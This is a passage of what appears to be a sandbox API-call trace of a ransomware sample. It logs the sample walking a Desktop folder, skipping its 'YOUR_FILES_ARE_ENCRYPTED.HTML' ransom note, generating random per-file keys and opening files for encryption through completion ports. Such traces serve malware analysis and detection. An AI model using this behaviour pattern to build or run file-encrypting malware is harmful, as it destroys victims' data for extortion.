param_1=0x4ebda46, param_2="%02X" | out: param_1="4F") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="32") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F3") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B4") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EE") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="81") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A4") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="35") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="B1") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="88") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: 
param_1="81") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="63") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EE") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D8") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AF") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="66") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DA") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="99") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="55") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="49") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="41") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A1") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E8") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="28") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="DD") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="76") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="AB") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6C") returned 2 [0165.880] lstrcpyW (in: lpString1=0x7600104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav" [0165.880] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x75f0050, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.880] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75f0050, lpOverlapped=0x75f0050) returned 1 [0165.880] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf95a69e0, ftCreationTime.dwHighDateTime=0x1d7df0d, ftLastAccessTime.dwLowDateTime=0x49643530, ftLastAccessTime.dwHighDateTime=0x1d7e574, ftLastWriteTime.dwLowDateTime=0x49643530, ftLastWriteTime.dwHighDateTime=0x1d7e574, nFileSizeHigh=0x0, nFileSizeLow=0xa319, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="0W_eZ.png", cAlternateFileName="")) returned 1 [0165.880] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png") returned 49 [0165.880] lstrcmpW (lpString1="0W_eZ.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.880] PathFindExtensionW (pszPath="0W_eZ.png") returned=".png" [0165.881] lstrlenW (lpString=".png") returned 4 [0165.881] PathFindExtensionW (pszPath="0W_eZ.png") returned=".png" [0165.881] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\0w_ez.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0165.884] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=41753) returned 1 [0165.884] GetProcessHeap () returned 0x270000 [0165.884] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0165.889] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6F") returned 2 [0165.889] wsprintfW 
(in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="19") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="0D") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B4") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9F") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="6E") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="35") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="7C") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D6") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="E6") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="E0") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D4") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CD") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C5") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="51") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="42") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="5F") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="93") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="3C") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="61") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="11") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2B") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="DD") 
returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="0A") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="12") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="8E") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="45") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B4") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="5D") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="19") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1F") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7F") returned 2 [0165.891] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png" [0165.891] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.892] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0165.892] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a3daf80, ftCreationTime.dwHighDateTime=0x1d7e4b5, ftLastAccessTime.dwLowDateTime=0xeba5afc0, ftLastAccessTime.dwHighDateTime=0x1d7e544, ftLastWriteTime.dwLowDateTime=0xeba5afc0, ftLastWriteTime.dwHighDateTime=0x1d7e544, nFileSizeHigh=0x0, nFileSizeLow=0xb9ee, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="9XDWC.bmp", cAlternateFileName="")) returned 1 [0165.892] wnsprintfW (in: pszDest=0x75e0048, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\9XDWC.bmp") returned 49 [0165.892] lstrcmpW (lpString1="9XDWC.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.892] PathFindExtensionW (pszPath="9XDWC.bmp") returned=".bmp" [0165.892] lstrlenW (lpString=".bmp") returned 4 [0165.892] PathFindExtensionW (pszPath="9XDWC.bmp") returned=".bmp" [0165.892] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10dde670, ftCreationTime.dwHighDateTime=0x1d7e36c, ftLastAccessTime.dwLowDateTime=0x891456b0, ftLastAccessTime.dwHighDateTime=0x1d7e6f0, ftLastWriteTime.dwLowDateTime=0x891456b0, ftLastWriteTime.dwHighDateTime=0x1d7e6f0, nFileSizeHigh=0x0, nFileSizeLow=0xf6b0, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="fCOxneQ.ods", cAlternateFileName="")) returned 1 [0165.892] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods") returned 51 [0165.892] lstrcmpW (lpString1="fCOxneQ.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.892] PathFindExtensionW (pszPath="fCOxneQ.ods") returned=".ods" [0165.892] lstrlenW (lpString=".ods") returned 4 [0165.892] PathFindExtensionW (pszPath="fCOxneQ.ods") returned=".ods" [0165.892] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\fcoxneq.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0165.904] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=63152) returned 1 [0165.904] GetProcessHeap () 
returned 0x270000 [0165.904] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0165.905] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="28") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E9") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B4") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F8") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="81") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="13") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="1A") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BC") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="FB") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A2") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="3D") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D6") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="24") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4A") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0E") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="E7") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="10") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A5") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A6") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="85") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda86, 
param_2="%02X" | out: param_1="70") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B1") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="29") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D6") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AD") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A5") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="76") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1D") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="01") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="59") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="2D") returned 2 [0165.906] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="17") returned 2 [0165.907] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods" [0165.907] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.907] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0165.907] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8181290, ftCreationTime.dwHighDateTime=0x1d7dbc3, ftLastAccessTime.dwLowDateTime=0x8930ee00, ftLastAccessTime.dwHighDateTime=0x1d7e11f, ftLastWriteTime.dwLowDateTime=0x8930ee00, 
ftLastWriteTime.dwHighDateTime=0x1d7e11f, nFileSizeHigh=0x0, nFileSizeLow=0x12c99, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="jYoN.swf", cAlternateFileName="")) returned 1 [0165.907] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\jYoN.swf") returned 48 [0165.908] lstrcmpW (lpString1="jYoN.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.908] PathFindExtensionW (pszPath="jYoN.swf") returned=".swf" [0165.908] lstrlenW (lpString=".swf") returned 4 [0165.908] PathFindExtensionW (pszPath="jYoN.swf") returned=".swf" [0165.908] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd00210a0, ftCreationTime.dwHighDateTime=0x1d7e699, ftLastAccessTime.dwLowDateTime=0x4c668350, ftLastAccessTime.dwHighDateTime=0x1d7e722, ftLastWriteTime.dwLowDateTime=0x4c668350, ftLastWriteTime.dwHighDateTime=0x1d7e722, nFileSizeHigh=0x0, nFileSizeLow=0x1c9e, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="oHGOlTifeSET7B2 HWLe.flv", cAlternateFileName="OHGOLT~1.FLV")) returned 1 [0165.908] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv") returned 64 [0165.908] lstrcmpW (lpString1="oHGOlTifeSET7B2 HWLe.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.908] PathFindExtensionW (pszPath="oHGOlTifeSET7B2 HWLe.flv") returned=".flv" [0165.908] lstrlenW (lpString=".flv") returned 4 [0165.908] PathFindExtensionW (pszPath="oHGOlTifeSET7B2 HWLe.flv") returned=".flv" [0165.908] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\ccay71x\\ohgoltifeset7b2 hwle.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0165.918] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=7326) returned 1 [0165.918] GetProcessHeap () returned 0x270000 [0165.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0165.919] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="69") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A6") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="13") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="59") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="6A") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A4") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="22") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F3") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="80") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B8") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6E") returned 2 [0165.919] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="F1") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="15") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="09") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C4") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="3E") returned 2 [0165.920] wsprintfW (in: 
param_1=0x4ebda76, param_2="%02X" | out: param_1="38") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="96") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="04") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D4") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="10") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="51") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F4") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DF") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="51") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="25") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9C") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C7") returned 2 [0165.920] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="89") returned 2 [0165.921] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="BF") returned 2 [0165.921] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E5") returned 2 [0165.921] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0B") returned 2 [0165.921] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv" [0165.921] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.921] PostQueuedCompletionStatus (CompletionPort=0x3a0, 
dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0165.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10600, ftCreationTime.dwHighDateTime=0x1d7d866, ftLastAccessTime.dwLowDateTime=0xe273c790, ftLastAccessTime.dwHighDateTime=0x1d7dac5, ftLastWriteTime.dwLowDateTime=0xe273c790, ftLastWriteTime.dwHighDateTime=0x1d7dac5, nFileSizeHigh=0x0, nFileSizeLow=0x12035, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="ra1fSL6OZqTy.bmp", cAlternateFileName="RA1FSL~1.BMP")) returned 1 [0165.922] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\ra1fSL6OZqTy.bmp") returned 56 [0165.922] lstrcmpW (lpString1="ra1fSL6OZqTy.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.922] PathFindExtensionW (pszPath="ra1fSL6OZqTy.bmp") returned=".bmp" [0165.922] lstrlenW (lpString=".bmp") returned 4 [0165.922] PathFindExtensionW (pszPath="ra1fSL6OZqTy.bmp") returned=".bmp" [0165.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe70030d0, ftCreationTime.dwHighDateTime=0x1d7de23, ftLastAccessTime.dwLowDateTime=0x6ebfde70, ftLastAccessTime.dwHighDateTime=0x1d7dfe2, ftLastWriteTime.dwLowDateTime=0x6ebfde70, ftLastWriteTime.dwHighDateTime=0x1d7dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x14447, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="S2bdrGwi.bmp", cAlternateFileName="")) returned 1 [0165.922] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\S2bdrGwi.bmp") returned 52 [0165.922] lstrcmpW (lpString1="S2bdrGwi.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.922] PathFindExtensionW (pszPath="S2bdrGwi.bmp") returned=".bmp" 
[0165.922] lstrlenW (lpString=".bmp") returned 4 [0165.922] PathFindExtensionW (pszPath="S2bdrGwi.bmp") returned=".bmp" [0165.922] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1beab810, ftCreationTime.dwHighDateTime=0x1d7e1d5, ftLastAccessTime.dwLowDateTime=0xef9fafc0, ftLastAccessTime.dwHighDateTime=0x1d7e38e, ftLastWriteTime.dwLowDateTime=0xef9fafc0, ftLastWriteTime.dwHighDateTime=0x1d7e38e, nFileSizeHigh=0x0, nFileSizeLow=0xacc2, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="SaH.png", cAlternateFileName="")) returned 1 [0165.922] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png") returned 47 [0165.922] lstrcmpW (lpString1="SaH.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.922] PathFindExtensionW (pszPath="SaH.png") returned=".png" [0165.922] lstrlenW (lpString=".png") returned 4 [0165.923] PathFindExtensionW (pszPath="SaH.png") returned=".png" [0165.923] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\SaH.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\sah.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.012] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=44226) returned 1 [0166.012] GetProcessHeap () returned 0x270000 [0166.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.013] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CB") returned 2 [0166.013] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="4B") returned 2 [0166.013] wsprintfW (in: 
